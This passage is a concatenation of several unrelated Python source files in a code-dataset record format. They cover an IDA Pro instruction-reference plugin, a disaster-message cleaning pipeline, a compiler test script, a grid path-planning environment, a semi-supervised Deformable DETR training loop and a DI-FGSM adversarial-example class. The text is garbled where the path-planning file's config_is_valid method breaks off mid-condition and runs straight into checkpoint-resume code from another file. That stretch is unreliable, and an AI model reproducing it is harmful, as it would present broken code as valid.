None:\n return None\n\n sel = int(sel)\n\n if sel > 0 and sel <= len(availList):\n return availList[sel - 1]\n\n return None\n\n def loadArchitecture(self, name):\n # fix up name\n name = name.lower()\n if name == \"metapc\":\n name = \"x86-64\"\n\n self.arch = name\n\n path = self.base_path\n dbpath = os.path.join(path, \"archs\", name + \".sql\")\n\n if not os.path.isfile(dbpath):\n print(\"Manual not found for architecture: %s\" % name)\n return False\n\n con = sq.connect(\":memory:\")\n con.text_factory = str\n con.executescript(open(dbpath).read())\n\n cur = con.cursor()\n cur.execute(\"SELECT mnem, description FROM instructions\")\n con.commit()\n\n rows = cur.fetchall()\n for row in rows:\n inst = row[0]\n lines = row[1].replace(\"\\r\\n\", \"\\n\").split(\"\\n\")\n\n self.inst_map[inst] = lines\n\n con.close()\n\n for (inst, data) in self.inst_map.items():\n data = data[0]\n\n if data[0:3] == \"-R:\":\n ref = data[3:]\n\n if ref in self.inst_map:\n self.inst_map[inst] = self.inst_map[ref]\n\n print(\"Manual loaded for architecture: %s\" % name)\n return True\n\n def getIdaArchitecture(self):\n inf = idaapi.get_inf_structure()\n\n return inf.procName\n\n def OnClose(self):\n self.destroying = True\n self.is_loaded = False\n\n # give clean up a chance, to prevent a crash\n # because I can't detect in update function\n # that IDA is closing.\n time.sleep(1)\n\n def cleanInstruction(self, inst):\n if self.arch == \"x86-64\":\n inst = inst.upper()\n # hacks for x86\n if inst[0:1] == \"J\" and inst != \"JMP\":\n inst = \"Jcc\"\n elif inst[0:4] == \"LOOP\":\n inst = \"LOOP\"\n elif inst[0:3] == \"INT\":\n inst = \"INT n\"\n elif inst[0:5] == \"FCMOV\":\n inst = \"FCMOVcc\"\n elif inst[0:4] == \"CMOV\":\n inst = \"CMOVcc\"\n elif inst[0:3] == \"SET\":\n inst = \"SETcc\"\n\n return inst\n\n def update(self, force=False):\n inst = self.cleanInstruction(print_insn_mnem(get_screen_ea()))\n\n if inst != self.last_inst or force == True:\n self.load_inst(inst)\n\n def load_inst(self, inst, wasLookup=False):\n inst = self.cleanInstruction(inst)\n\n if wasLookup == False:\n self.last_inst = inst\n\n self.ClearLines()\n\n if inst not in self.inst_map:\n inst = inst.upper()\n\n if inst in self.inst_map:\n text = self.inst_map[inst]\n\n if len(text) > 0:\n self.AddLine(inst + \": \" + text[0])\n if len(text) > 1:\n for line in text[1:]:\n self.AddLine(line)\n\n else:\n self.AddLine(inst + \" not documented.\")\n\n self.Refresh()\n self.Jump(0, 0)\n\n def OnPopupMenu(self, menu_id):\n if menu_id == self.menu_update:\n self.update(True)\n elif menu_id == 
self.menu_lookup:\n inst = ask_str(self.last_inst, 0, \"Instruction: \")\n if inst != None:\n self.load_inst(inst, True)\n elif menu_id == self.menu_autorefresh:\n self.do_auto = not self.do_auto\n elif menu_id == self.change_arch:\n arch = self.askArchitecture(self.archs)\n\n if arch != None:\n self.loadArchitecture(arch)\n self.update(True)\n else:\n # Unhandled\n return False\n return True\n\n\n\"\"\"\nIDA Pro Plugin Interface\nDefine an IDA Python plugin required class and function.\n\nInpired by idarest plugin.\n\"\"\"\n\nMENU_PATH = \"Edit/idaref/\"\nALTERNATIVE_MENU_PATH = \"Edit/Patch Program/\"\n\n\nclass idaref_plugin_t(idaapi.plugin_t):\n flags = idaapi.PLUGIN_KEEP\n comment = \"\"\n\n help = \"IdaRef: Presents complete instruction reference for an instruction under cursor\"\n wanted_name = \"IDA Instruction Reference\"\n wanted_hotkey = \"Alt-8\"\n website = \"https://github.com/nologic/idaref\"\n\n def _add_menu(self, *args):\n ctx = idaapi.add_menu_item(*args)\n\n if ctx is None:\n idaapi.msg(\"Add failed!\\n\")\n return False\n else:\n self.ctxs.append(ctx)\n return True\n\n def _add_menus(self):\n ret = []\n if idaapi.IDA_SDK_VERSION <= 695:\n menu_path = MENU_PATH if idaapi.IDA_SDK_VERSION > 660 else ALTERNATIVE_MENU_PATH\n ret.append(self._add_menu(menu_path, \"Stop IdaRef\", \"\", 1, self.stop, tuple()))\n ret.append(self._add_menu(menu_path, \"Start IdaRef\", \"\", 1, self.start, tuple()))\n\n if idaapi.IDA_SDK_VERSION >= 700:\n action_desc = idaapi.action_desc_t(\n \"idaref:stop\", # The action name. Must be unique\n \"Stop Idaref\", # Action Text\n StopHandler(), # Action handler\n \"\", # Optional shortcut\n \"Stop Idaref\", # Action tooltip\n )\n idaapi.register_action(action_desc)\n idaapi.attach_action_to_menu(MENU_PATH, \"idaref:stop\", idaapi.SETMENU_APP)\n\n action_desc = idaapi.action_desc_t(\n \"idaref:start\", # The action name. 
Must be unique\n \"Start Idaref\", # Action Text\n StartHandler(), # Action handler\n \"\", # Optional shortcut\n \"Start Idaref\", # Action tooltip\n )\n idaapi.register_action(action_desc)\n idaapi.attach_action_to_menu(MENU_PATH, \"idaref:start\", idaapi.SETMENU_APP)\n\n if False in ret:\n return idaapi.PLUGIN_SKIP\n else:\n return idaapi.PLUGIN_KEEP\n\n def init(self):\n global initialized\n ret = idaapi.PLUGIN_SKIP\n if initialized == False:\n initialized = True\n self.ctxs = []\n insref_g = None\n ret = self._add_menus()\n idaapi.msg(\"IdaRef initialized\\n\")\n\n return ret\n\n def start(self, *args):\n global insref_g\n idaapi.msg(\"Starting IdaRef\\n\")\n\n if insref_g != None and find_widget(insref_g.title) == None:\n self.stop()\n\n if insref_g == None:\n insref_g = InstructionReference(self)\n else:\n print(\"IdaRef Already started\")\n\n def stop(self, *args):\n global insref_g\n idaapi.msg(\"Stopping IdaRef\\n\")\n\n if insref_g != None:\n insref_g.destroy()\n insref_g = None\n else:\n print(\"IdaRef is not running\")\n\n def run(self, arg):\n pass\n\n def term(self):\n idaapi.msg(\"Terminating %s\\n\" % self.wanted_name)\n try:\n self.stop()\n except:\n pass\n\n for ctx in self.ctxs:\n idaapi.del_menu_item(ctx)\n\n\ndef PLUGIN_ENTRY():\n return idaref_plugin_t()\n","repo_name":"nologic/idaref","sub_path":"idaref.py","file_name":"idaref.py","file_ext":"py","file_size_in_byte":14536,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"37"} +{"seq_id":"15030155309","text":"import pandas as pd\nimport numpy as np\nimport sys\nfrom sqlalchemy import create_engine\n\n\n'''Global Variables defined: list to store the column data'''\ncolumns=[]\n\ndef get_file_names():\n '''Capture file name arguments passed to command line \n and transfer to relevant functions as their required arguments'''\n files=list()\n for arg in sys.argv:\n files.append(arg)\n if len(files)!=4:\n raise ValueError(\"Provide three filenames to the pipeline\\\n in sequence messages.csv,\\\n categories.csv , databasse.db\")\n if files[1].split('.')[-1]!='csv' :\n raise ValueError (f\"Provide .CSV filename at {files[1]} \")\n if files[2].split('.')[-1]!='csv' :\n raise ValueError (f\"Provide .CSV filename at {files[2]} \")\n if files[3].split('.')[-1]!='db' :\n raise ValueError (f\"Provide .db extension at {files[3]} \")\n return files[1:]\n\n\ndef column_update(l,entry) :\n '''helper function to manage column list '''\n if entry in l:\n pass\n else:\n l.append(entry)\n \n\n\ndef read_categories(path_csv):\n '''This function is to read the categories'\n matrix-data from the categories.csv '''\n #reading the given file \n fp= open(path_csv,'r')\n while(True):\n a=fp.readline()\n if a =='':\n fp.close()\n break\n yield None\n else:\n a=a.replace('\\n','')\n items=a.split(',')\n result=[]\n for item in items:\n splits=item.split(';')\n if item=='categories' :\n continue\n if item=='id':\n column_update(columns,item)\n continue\n elif len(splits) >2 : \n for vals in splits:\n tmp=vals.split('-')\n column_update(columns,tmp[0])\n result.append(int(tmp[-1]))\n else:\n result.append(int(splits[0]))\n if len(result)>=1:\n yield result\n else:\n continue\n\ndef load_data(messages_filepath, categories_filepath):\n '''extracting and two csv file data'''\n messages = pd.read_csv(messages_filepath)\n categories = pd.DataFrame(read_categories(categories_filepath)\n ,columns=columns)\n return messages, categories\n\n\ndef remove_duplicates(df):\n df=df[~df.duplicated()]\n return 
df\n\ndef clean_data(df):\n    #get all the data into binary format\n    #only the 'related' column has non-binary data, and \n    #those rows carry no data for the other columns, and \n    #hence they are eliminated. \n    df=df[~(df['related']==2)]\n    #Also note that the column 'child_alone' has all rows with values of zero, but\n    #the column is not being dropped, in order to preserve it for \n    #availability in future data.\n    #df=df.drop(columns=['child_alone'])\n    return df\n\ndef merge_dataframe(messages,categories):\n    df = messages.merge(categories, on = 'id', how='left')\n    return df\n\ndef save_data(df, database_filename,tableName):\n    engine = create_engine(f'sqlite:///{database_filename}')\n    conn=engine.connect()\n    engine.execute(f\"DROP TABLE IF EXISTS {tableName}\")\n    df.to_sql(tableName, conn, index=False)\n    return True \n\n\ndef main():\n    if len(sys.argv) == 4:\n\n        messages_filepath, categories_filepath, database_filepath = get_file_names()\n\n        print('Loading data...\\n    MESSAGES: {}\\n    CATEGORIES: {}'\n              .format(messages_filepath, categories_filepath))\n        message,categories = load_data(messages_filepath, categories_filepath)\n\n        print('Cleaning data...')\n        message = remove_duplicates(message)\n        categories = remove_duplicates(categories)\n        df = clean_data(merge_dataframe(message,categories))\n        \n        print('Saving data...\\n    DATABASE: {}'.format(database_filepath))\n        tableName='categorizedMessages'\n        save_data(df, database_filepath,tableName)\n        \n        print('Cleaned data saved to database!')\n    \n    else:\n        print('Please provide the filepaths of the messages and categories '\\\n              'datasets as the first and second argument respectively, as '\\\n              'well as the filepath of the database to save the cleaned data '\\\n              'to as the third argument. \\n\\nExample: python process_data.py '\\\n              'disaster_messages.csv disaster_categories.csv '\\\n              'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n    main()","repo_name":"rindhane/MessageLabelling","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
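The `save_data` helper above issues a raw `DROP TABLE` through the engine before writing. A minimal sketch of the same step using pandas' built-in `if_exists='replace'`, which drops and recreates the table in one call (function and table names mirror the snippet; this is an illustrative alternative, not the repository's code):

```python
import pandas as pd
from sqlalchemy import create_engine

def save_data(df, database_filename, tableName):
    # if_exists='replace' drops any existing table and recreates it in one call
    engine = create_engine(f'sqlite:///{database_filename}')
    df.to_sql(tableName, engine, index=False, if_exists='replace')
    return True
```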
+{"seq_id":"74126301866","text":"import os\nimport subprocess\n\npwd = os.getcwd()\n\ntarget_dir = os.path.join(pwd, '..\\\\cmake-build-debug')\n\ncompile_path = os.path.join(target_dir, 'Compiler.exe')\nmips_path = os.path.join(target_dir, 'mips.txt')\n\ntestfile_dst = os.path.join(target_dir, \"testfile.txt\")\ninput_dst = os.path.join(target_dir, \"input.txt\")\noutput_dst = os.path.join(target_dir, \"output.txt\")\n\n# Check whether Mars is present under cmake-build-debug\nmars_path = os.path.join(target_dir, 'Mars4Compiler.jar')\nif not os.path.exists(mars_path):\n    print('Cannot find Mars: copy one')\n    os.system('xcopy /y Mars4Compiler.jar ..\\\\cmake-build-debug\\\\')\n\n# Print basic test information\ntest_dir = os.path.join(pwd, \"2021-test-1201\") # 2022-test-1105\ntest_dir = os.path.join(pwd, \"2022-test-1105\")\ntar_no = 2\ntar_level = 'A'\nroot = os.path.join(test_dir, tar_level)\n\nprint('dataset:', os.path.split(test_dir)[1])\nprint('level:', tar_level)\nprint('testfile', tar_no)\nprint('============================')\n\n# Copy the test files into cmake-build-debug to make testing easier\ntestfile_src = os.path.join(root, 'testfile' + str(tar_no) + '.txt')\ninput_src = os.path.join(root, 'input' + str(tar_no) + '.txt')\noutput_src = os.path.join(root, 'output' + str(tar_no) + '.txt')\nos.system('echo f | xcopy /y ' + testfile_src + ' ' + testfile_dst + ' > log.txt')\nos.system('echo f | xcopy /y ' + input_src + ' ' + input_dst + ' > log.txt')\nos.system('echo f | xcopy /y ' + output_src + ' ' + output_dst + ' > log.txt')\n\n# Run Compiler.exe inside cmake-build-debug to produce mips.txt\nsubprocess.run(compile_path, cwd=target_dir, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n# Feed input.txt through Mars and collect the result\nfin = open(input_dst, mode='r')\nsp = subprocess.Popen(\"java -jar Mars4Compiler.jar mips.txt\", cwd=target_dir, stdin=fin, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nres = bytes.decode(sp.communicate()[0])\nprint('[self]')\nprint(res)\nprint('-------------------')\nres_list = res.replace('\\r\\n', '\\n').split('\\n')[2:]\nsp.kill()\nfin.close()\n\n# Compare against output.txt to verify\nfcheck = open(output_dst, mode='r')\nans = fcheck.read()\nprint('[ans]')\nprint(ans)\nprint('-------------------')\nans_list = ans.replace('\\r\\n', '\\n').split('\\n')\nfcheck.close()\nline_num = min(len(ans_list), len(res_list))\nif len(ans_list) != len(res_list):\n    print('[warning] line num different! ans-res :', str(len(ans_list)) + '-' + str(len(res_list)))\nwrong_line = []\nflag = True\nfor lno in range(line_num):\n    if res_list[lno] != ans_list[lno]:\n        wrong_line.append(lno + 1)\n        flag = False\n        # break\nprint('pass' if flag else 'wrong at line ' + str(wrong_line))\n\n\n","repo_name":"Xlucidator/2022-BUAA-Compiler","sub_path":"test/single_test.py","file_name":"single_test.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"23786632545","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndevice=torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nclass Vertex():\n    def __init__(self, row, col):\n        self.row=row\n        self.col=col\n        self.parent=None\n    \n    def __repr__(self):\n        return 'Row: {:.2f}, Col: {:.2f}'.format(self.row, self.col)\n\nclass Env2D():\n    def __init__(self, h, w, N):\n        self.h=h\n        self.w=w\n        self.grid=torch.zeros(h,w).to(device)\n        self.start=None\n        self.goal=None\n        self.generate_obstacles(N) #0: free space, 1: obstacles\n        self.get_start_and_goal()\n        self.vertices=self.get_vertices()\n\n    def generate_obstacles(self, N):\n        for _ in range(N):\n            obs_r1=np.random.randint(low=0, high=self.h)\n            obs_r2=np.random.randint(low=obs_r1, high=self.h)\n            obs_c1=np.random.randint(low=0, high=self.w)\n            obs_c2=np.random.randint(low=obs_c1, high=self.w)\n            #mark obstacle grids with 1\n            self.grid[obs_r1:obs_r2+1, obs_c1:obs_c2+1]=1\n        return\n    \n    def get_vertices(self):\n        vertices=[]\n        for row in range(self.h):\n            for col in range(self.w):\n                if self.grid[row,col]==0:\n                    vertices.append(Vertex(row,col))\n        return vertices\n\n    def config_is_valid(self, row, col):\n        validity=False\n        if row>=0 and row<self.h and col>=0 and col<self.w:\n        if len(missing_keys) > 0:\n            print('Missing Keys: {}'.format(missing_keys))\n        if len(unexpected_keys) > 0:\n            print('Unexpected Keys: {}'.format(unexpected_keys))\n        if not cfg.EVAL and 'optimizer' in checkpoint and 'lr_scheduler' in checkpoint and 'epoch' in checkpoint:\n            import copy\n            p_groups = copy.deepcopy(optimizer.param_groups)\n            optimizer.load_state_dict(checkpoint['optimizer'])\n            for pg, pg_old in zip(optimizer.param_groups, p_groups):\n                pg['lr'] = pg_old['lr']\n                pg['initial_lr'] = pg_old['initial_lr']\n\n            lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n            # todo: this is a hack for doing an experiment that resumes from a checkpoint and also modifies the lr scheduler (e.g., decrease lr in advance).\n            override_resumed_lr_drop = True\n            if override_resumed_lr_drop:\n                print('Warning: (hack) override_resumed_lr_drop is set to True, so cfg.TRAIN.LR_DROP would override lr_drop in resumed lr_scheduler.')\n                lr_scheduler.step_size = cfg.TRAIN.LR_DROP\n                lr_scheduler.base_lrs = list(map(lambda group: group['initial_lr'], optimizer.param_groups))\n                lr_scheduler.step(lr_scheduler.last_epoch)\n            cfg.START_EPOCH = checkpoint['epoch'] + 1 \n
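The resume logic above restores optimizer and scheduler state and reports missing/unexpected keys. A self-contained sketch of the `strict=False` loading pattern it relies on (the model object and file path are placeholders, not the repository's own objects):

```python
import torch

def load_partial_checkpoint(model, path):
    checkpoint = torch.load(path, map_location='cpu')
    # strict=False skips incompatible keys instead of raising, and reports them
    missing, unexpected = model.load_state_dict(checkpoint['model'], strict=False)
    if missing:
        print('Missing Keys: {}'.format(missing))
    if unexpected:
        print('Unexpected Keys: {}'.format(unexpected))
    return checkpoint.get('epoch', -1) + 1  # next epoch to train
```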
        # check the resumed model\n        if not cfg.EVAL:\n            test_stats, coco_evaluator = evaluate(\n                model, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n            )\n            print('Testing finished'.center(50, '*'))\n\n    # if cfg.EVAL:\n    #     test_stats, coco_evaluator = evaluate(model, criterion, postprocessors,\n    #                                           data_loader_val, base_ds, device, cfg.OUTPUT_DIR)\n    #     if cfg.OUTPUT_DIR:\n    #         utils.save_on_master(coco_evaluator.coco_eval[\"bbox\"].eval, output_dir / \"eval.pth\")\n    #     return\n\n#-------------------2023.03.17-------create the EMA model---------------------\n    # EMA\n    ema_model = EMA.ModelEMA(model)\n\n    semi_ema = None\n    #used at evaluation time\n    #original model\n    best_checkpoint_fitness = 0\n    #semi_ema\n    best_semi_ema_fitness = 0\n    cache_best_semi_ema_epoch = 0\n    #ema\n    best_ema_fitness = 0\n    cache_best_ema_epoch = 0\n\n    #---record the evaluation metrics---\n    ema_model_eval = []\n    semi_ema_model_eval = []\n    if cfg.SSOD.RESUME_EMA:\n        checkpoint_ema = torch.load(cfg.SSOD.RESUME_EMA, map_location='cpu')\n        ema_model.ema.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n#---------------------------------------------------------------------\n\n
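`EMA.ModelEMA` is defined elsewhere in the repository and not shown here; the sketch below is a minimal version of the exponential-moving-average update such a class typically performs (class name and decay value are illustrative assumptions, not the project's implementation):

```python
import copy
import torch

class SimpleModelEMA:
    def __init__(self, model, decay=0.9998):
        # the EMA copy is frozen and only updated via the moving average
        self.ema = copy.deepcopy(model).eval()
        self.decay = decay
        for p in self.ema.parameters():
            p.requires_grad_(False)

    @torch.no_grad()
    def update(self, model):
        # ema_param <- decay * ema_param + (1 - decay) * param
        msd = model.state_dict()
        for k, v in self.ema.state_dict().items():
            if v.dtype.is_floating_point:
                v.mul_(self.decay).add_(msd[k].detach(), alpha=1.0 - self.decay)
```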
#===============adaptive thoushold 20230406=================\n    th = cfg.SSOD.thoushold_value\n    AT = None\n    if cfg.SSOD.adaptive_thoushold:\n        from models.label_match import AdaptiveThreshold\n        #initialize the adaptive-threshold network\n        AT = AdaptiveThreshold(cfg.DATASET.NUM_CLASSES - 1,th)\n#==========================================================\n\n    print(\"Start training\")\n    cfg.START_EPOCH = 0 #reset the starting epoch for semi-supervised training\n    start_time = time.time()\n    for epoch in range(cfg.START_EPOCH, cfg.TRAIN.EPOCHS):\n        #--------------original adversarial training----------------\n        # epoch starts from 0\n        if epoch < cfg.SSOD.burn_epochs:\n            if cfg.DIST.DISTRIBUTED:\n                sampler_train.set_epoch(epoch)\n        #--------------------------------------\n            #---training fluctuates quite a bit, so load the best model into model for the training after epoch 40, to further improve the best result\n\n            if epoch == cfg.TRAIN.LR_DROP:\n                # if utils.is_main_process():\n                print(\n                    'Loading the best model'\n                )\n\n                checkpoint_ema = torch.load(os.path.join(output_dir,'best_ema.pth'), map_location='cpu')\n                if not cfg.DIST.DISTRIBUTED:\n                    model_without_ddp.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n                else:#DDP model\n                    state_dict = {k.replace(\"module.\",\"\"):v for k, v in checkpoint_ema['ema_model'].items()}\n                    model_without_ddp.load_state_dict(state_dict, strict=True)\n\n                #evaluate, for debugging\n                test_stats, coco_evaluator = evaluate(\n                    model, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n                ) #----------------------------------------\n\n\n            train_stats = train_one_epoch(\n                model, criterion, data_loader_train, optimizer, device, epoch, cfg.TRAIN.CLIP_MAX_NORM)\n\n\n        else:\n            if cfg.DIST.DISTRIBUTED:\n                sampler_train.set_epoch(epoch)\n                sampler_train_strong_aug.set_epoch(epoch)\n\n\n            # -------------------2023.03.17-------create the EMA model---------------------\n            #(1) assign the EMA weights\n            # 1.1 copy the EMA weights into model\n            if epoch == cfg.SSOD.burn_epochs:\n                #reset the learning rate: multiply it by 10\n                for p in optimizer.param_groups:\n                    p['lr'] *= 10\n\n                print(\n                    'Loading the best model for semi-supervised training'\n                )\n\n                checkpoint_ema = torch.load(os.path.join(output_dir,'best_ema.pth'), map_location='cpu')\n                if not cfg.DIST.DISTRIBUTED:\n                    model_without_ddp.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n                    ema_model.ema.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n                else: #DDP\n                    state_dict = {k.replace(\"module.\", \"\"): v for k, v in checkpoint_ema['ema_model'].items()}\n                    model_without_ddp.load_state_dict(state_dict, strict=True)\n                    ema_model.ema.load_state_dict(state_dict, strict=True)\n\n                # evaluate, for debugging\n                # test_stats, coco_evaluator = evaluate(\n                #     ema_model.ema, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n                # ) # ---------------------\n\n\n                #1.2 create semi_ema\n                if cfg.SSOD.cosine_ema:\n                    semi_ema = EMA.CosineEMA(ema_model.ema, decay_start=cfg.SSOD.ema_rate,\n                                             total_epoch= cfg.TRAIN.EPOCHS - cfg.SSOD.burn_epochs)\n                else:\n                    semi_ema = EMA.SemiSupModelEMA(ema_model.ema, cfg.SSOD.ema_rate)\n            #(2) training\n            train_stats = train_one_epoch_with_ssod(\n                model, criterion, criterion_ssod,data_loader_train, data_loader_train_strong_aug,optimizer, device, epoch, ema_model,output_dir,\n                AT,cfg.DATASET.NUM_CLASSES,th,cfg.TRAIN.CLIP_MAX_NORM)\n\n            #(3) after training\n            #ema and semi_ema both need updating\n            #1) update ema\n            ema_model.update(model)\n            #2) update semi_ema\n            if semi_ema:\n                semi_ema.update_decay(epoch - cfg.SSOD.burn_epochs) #update the decay of semi_ema\n                semi_ema.update(ema_model.ema)\n\n        lr_scheduler.step()\n\n
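`EMA.CosineEMA` is likewise external. One plausible cosine schedule for ramping the decay from `decay_start` toward 1.0 over the semi-supervised epochs looks like this (the repository's exact schedule may differ):

```python
import math

def cosine_ema_decay(epoch, total_epoch, decay_start=0.999):
    # cosine interpolation: decay_start at epoch 0, approaching 1.0 at the last epoch
    t = min(max(epoch, 0), total_epoch) / max(total_epoch, 1)
    return 1.0 - (1.0 - decay_start) * 0.5 * (1.0 + math.cos(math.pi * t))
```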
        #(4) evaluation\n        #4.1 evaluate the original model\n        test_stats, coco_evaluator = evaluate(\n            model, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n        )\n        #4.2\n        #1) if semi_ema exists, evaluate semi_ema\n        if epoch >= cfg.SSOD.burn_epochs:\n            test_stats_semi_ema, coco_evaluator_semi_ema = evaluate(\n                semi_ema.ema, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n            )\n        #2) otherwise evaluate ema_model\n        else:\n            test_stats_ema, coco_evaluator_ema = evaluate(\n                ema_model.ema, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n            )\n\n        #(5) saving\n        if cfg.OUTPUT_DIR and utils.is_main_process():\n            #5.1 save the best original model (IOU=0.5)\n            if test_stats['coco_eval_bbox'][1] >= best_checkpoint_fitness:\n                best_checkpoint_fitness = test_stats['coco_eval_bbox'][1]\n                checkpoint_path = output_dir / 'best_checkpoint.pth'\n                cache_best_checkpoint_epoch = epoch #record the epoch\n                utils.save_on_master({\n                    'model': model_without_ddp.state_dict(),\n                    'optimizer': optimizer.state_dict(),\n                    'lr_scheduler': lr_scheduler.state_dict(),\n                    'epoch': epoch,\n                    'cfg': cfg,\n                }, checkpoint_path)\n\n            #5.2 save the best ema model (IOU=0.5)\n            #1) save the best semi_ema\n            if epoch >= cfg.SSOD.burn_epochs:\n                semi_ema_model_eval.append(test_stats_semi_ema['coco_eval_bbox'][1])\n                #record the results\n                with open(output_dir / \"semi_ema_model_eval.txt\", 'w') as f:\n                    for i in semi_ema_model_eval:\n                        f.write('%s\\n'%i)\n\n                if test_stats_semi_ema['coco_eval_bbox'][1] >= best_semi_ema_fitness:\n                    best_semi_ema_fitness = test_stats_semi_ema['coco_eval_bbox'][1]\n                    checkpoint_path = output_dir / 'best_semi_ema.pth'\n                    cache_best_semi_ema_epoch = epoch # record the epoch\n                    utils.save_on_master({\n                        'semi_ema_model': semi_ema.ema.state_dict(),\n                        'epoch': epoch,\n                    }, checkpoint_path)\n\n            #2) save the best ema\n            if epoch < cfg.SSOD.burn_epochs:\n                ema_model_eval.append(test_stats_ema['coco_eval_bbox'][1])\n                #record the results\n                with open(output_dir / \"ema_model_eval.txt\", 'w') as f:\n                    for i in ema_model_eval:\n                        f.write('%s\\n'%i)\n\n                if test_stats_ema['coco_eval_bbox'][1] >= best_ema_fitness:\n                    best_ema_fitness = test_stats_ema['coco_eval_bbox'][1]\n                    checkpoint_path = output_dir / 'best_ema.pth'\n                    cache_best_ema_epoch = epoch # record the epoch\n                    utils.save_on_master({\n                        'ema_model': ema_model.ema.state_dict(),\n                        'epoch': epoch,\n                    }, checkpoint_path)\n\n            #(6) write the log\n            with open(output_dir / \"log_best.txt\",'w') as f:\n                f.write('best_checkpoint --> map50:%s , epoch:%s\\n'%(best_checkpoint_fitness,cache_best_checkpoint_epoch))\n                f.write('best_semi_ema --> map50:%s , epoch:%s\\n'%(best_semi_ema_fitness,cache_best_semi_ema_epoch))\n                f.write('best_ema --> map50:%s , epoch:%s\\n'%(best_ema_fitness,cache_best_ema_epoch))\n\n\n\n        log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},\n                     **{f'test_{k}': v for k, v in test_stats.items()},\n                     'epoch': epoch,\n                     'n_parameters': n_parameters}\n\n        if cfg.OUTPUT_DIR and utils.is_main_process():\n            with (output_dir / \"log.txt\").open(\"a\") as f:\n                f.write(json.dumps(log_stats) + \"\\n\")\n\n            # for evaluation logs\n            if coco_evaluator is not None:\n                (output_dir / 'eval').mkdir(exist_ok=True)\n                if \"bbox\" in coco_evaluator.coco_eval:\n                    filenames = ['latest.pth']\n                    if epoch % 50 == 0:\n                        filenames.append(f'{epoch:03}.pth')\n                    for name in filenames:\n                        torch.save(coco_evaluator.coco_eval[\"bbox\"].eval,\n                                   output_dir / \"eval\" / name)\n\n    total_time = time.time() - start_time\n    total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n    print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser('Deformable DETR Detector')\n    parser.add_argument('--config_file', default='', type=str)\n    parser.add_argument(\"--opts\", default=None, nargs=argparse.REMAINDER)\n    args = parser.parse_args()\n    cfg = setup(args)\n    main(cfg)\n","repo_name":"h751410234/RemoteSensingTeacher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20603,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
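The training script above appends one JSON object per epoch to `log.txt`. A small sketch for loading such a JSON-lines log back, e.g. to plot the mAP curve (the key name is derived from the `f'test_{k}'` prefixing in the snippet and is only an assumption about the resulting file):

```python
import json

def read_log(path='log.txt'):
    # one JSON object per line; skip blank lines
    with open(path) as f:
        return [json.loads(line) for line in f if line.strip()]

# e.g. map50 = [e['test_coco_eval_bbox'][1] for e in read_log()]
```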
+{"seq_id":"70232488106","text":"import numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\n\r\nfrom .. import Attack\r\n\r\nclass DIFGSM(Attack):\r\n    def __init__(self, model, dataloader, save_path, criterion,\r\n                 eps=8, steps=10, ieps=2, decay=1.0, resize_rate=0.9, diversity_prob=0.5):\r\n        _name = 'DIFGSM_{}_{}_{}_{}'.format(eps, steps, ieps, decay)\r\n        super(DIFGSM, self).__init__(_name, model, dataloader, save_path)\r\n        self.criterion = criterion\r\n        self.eps = eps / 255\r\n        self.steps = steps\r\n        self.ieps = ieps / 255\r\n        self.decay = decay\r\n        self.resize_rate = resize_rate\r\n        self.diversity_prob = diversity_prob\r\n\r\n\r\n    def attack(self, images, labels=None):\r\n        # random_start\r\n        delta = torch.empty_like(images, requires_grad=False)\r\n        delta = delta.uniform_(-self.eps, self.eps)\r\n        delta = torch.clamp(images + delta, 0, 1) - images\r\n        momentum = torch.zeros_like(images).detach().to(self.device)\r\n        adv_images = images.clone().detach()\r\n        for _ in range(self.steps):\r\n            adv_images.requires_grad = True\r\n            outputs = self.model(self.input_diversity(adv_images))\r\n            loss = self.criterion(outputs, labels)\r\n            grad = torch.autograd.grad(loss, adv_images,\r\n                                       retain_graph=False, create_graph=False)[0]\r\n            grad = grad / torch.mean(torch.abs(grad), dim=(1, 2, 3), keepdim=True)\r\n            grad = grad + momentum * self.decay\r\n            momentum = grad\r\n            delta += self.ieps * grad.sign()\r\n            delta = torch.clamp(delta, -self.eps, self.eps)\r\n            adv_images = torch.clamp(images + delta, 0, 1)\r\n            delta = (adv_images - images).detach()\r\n        return (adv_images - images).detach()\r\n\r\n    def input_diversity(self, x):\r\n        img_size = x.shape[-1]\r\n        img_resize = int(img_size * self.resize_rate)\r\n\r\n        if self.resize_rate < 1:\r\n            img_size = img_resize\r\n            img_resize = x.shape[-1]\r\n\r\n        rnd = torch.randint(low=img_size, high=img_resize, size=(1,), dtype=torch.int32)\r\n        rescaled = F.interpolate(x, size=[rnd, rnd], mode='bilinear', align_corners=False)\r\n        h_rem = img_resize - rnd\r\n        w_rem = img_resize - rnd\r\n        pad_top = torch.randint(low=0, high=h_rem.item(), size=(1,), dtype=torch.int32)\r\n        pad_bottom = h_rem - pad_top\r\n        pad_left = torch.randint(low=0, high=w_rem.item(), size=(1,), dtype=torch.int32)\r\n        pad_right = w_rem - pad_left\r\n\r\n        